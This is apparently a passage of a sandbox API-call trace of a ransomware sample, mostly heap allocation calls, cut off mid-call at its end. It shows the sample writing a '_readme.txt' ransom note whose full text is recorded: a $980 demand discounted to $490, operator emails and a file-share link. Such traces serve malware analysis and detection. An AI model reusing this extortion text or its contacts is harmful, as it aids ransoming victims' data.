lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.803] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0093.803] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.804] PathFindFileNameW (pszPath="") returned="" [0093.804] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.805] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.805] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.805] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330158 | out: hHeap=0x630000) returned 1 [0093.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x335e120 | out: hHeap=0x630000) returned 1 [0093.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330018 | out: hHeap=0x630000) returned 1 [0093.805] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0093.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330018 | out: hHeap=0x630000) returned 1 [0093.806] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0093.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.806] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.806] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.806] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.807] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.807] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.807] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.807] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.808] CloseHandle (hObject=0x5c8) returned 1 [0093.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.809] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330018 [0093.809] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa174e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa174e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330018 | out: hHeap=0x630000) returned 1 [0093.809] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa174e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa174e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.809] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa174e6a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa174e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa174e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.809] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa174e6a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa174e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa174e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.809] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0093.810] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0093.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0093.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0093.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0093.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0093.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0093.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0093.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0093.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0093.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0093.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0093.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.811] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, 